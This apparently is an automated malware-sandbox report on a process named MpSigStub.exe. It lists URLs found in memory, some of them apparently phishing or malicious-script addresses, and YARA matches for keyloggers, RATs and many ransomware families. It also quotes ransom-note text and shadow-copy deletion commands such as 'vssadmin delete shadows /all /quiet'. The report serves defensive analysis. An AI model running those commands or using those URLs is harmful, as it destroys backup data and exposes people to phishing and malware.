Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.escrowprotects.com/share
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://www.exploit-db.com/exploits/39719/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: https://www.fastsupport.com
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://www.fastsupport.com/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://www.finance-portal.basf.net/portal
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://www.flexdirect.adp.com/client/login.aspx
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://www.formtools.com/f/micr0soft0ffice365mail
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://www.freecontent.bid./cpcu.js
Source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/j/collect.
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com.tr/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://www.gynfit2019.com.br/fotos.jpg
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://www.hashing.win/scripts/min.js
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.hashing.win/t5s0.js
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://www.icq.com/people/
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hKAWruhccvaKl722JOqs1briWjn1s8ks HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g7dge6jvaanlcs7829hvlmboru4ioabe/1634024250000/16524389560697724177/*/1hKAWruhccvaKl722JOqs1briWjn1s8ks?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-28-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected VBKeyloggerGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Creates a DirectInput object (often for capturing keystrokes)
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp Binary or memory string: DirectDrawCreateEx
Installs a raw input device (often for capturing keystrokes)
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp Binary or memory string: GetRawInputData
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

E-Banking Fraud:

Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected BlackMoon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Ragnarok ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Globeimposter Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Avaddon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected BLACKMatter Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Jigsaw
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AESCRYPT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Rapid ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RansomwareGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Ouroboros ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Fiesta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Lolkek Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Chaos Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected TeslaCrypt Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mock Ransomware
Source: Yara match File source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Conti ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59d455.123.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59e859.148.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59d455.107.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59fe5d.109.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59d455.149.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59e859.122.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59fe5d.121.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59e859.108.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b59fe5d.150.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18330301023.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18316997643.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18338385554.0000015B1B3CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected NoCry Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected ByteLocker Ransomware
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RegretLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Crypt ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Clop Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LockBit ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LOCKFILE ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cerber ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Rhino ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Niros Ransomware
Source: Yara match File source: 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Buran Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected VHD ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Netwalker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Jcrypt Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Delta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LazParking Ransomware
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GlobeLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Zeppelin Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Apis Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Wannacry ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected MegaCortex Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cobra Locker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RekenSom ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Babuk Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Nemty Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Clay Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Thanos ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected CryLock ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected OCT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Snatch Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Silvertor Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Annabelle Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Gocoder ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp, type: MEMORY
Yara detected WannaRen ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Ryuk ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Zeoticus ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Porn Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected DarkSide Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected HiddenTear ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected WormLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mailto ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Voidcrypt Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18323868678.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GoGoogle ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Axiom Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Artemon Ransomware
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Covid19 Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LokiLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cryptolocker ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Marvel Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cute Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected 0x0M4R Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Amnesia ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Found potential ransomware demand text
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible]
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.
Deletes shadow drive data (may be related to ransomware)
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: T/c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
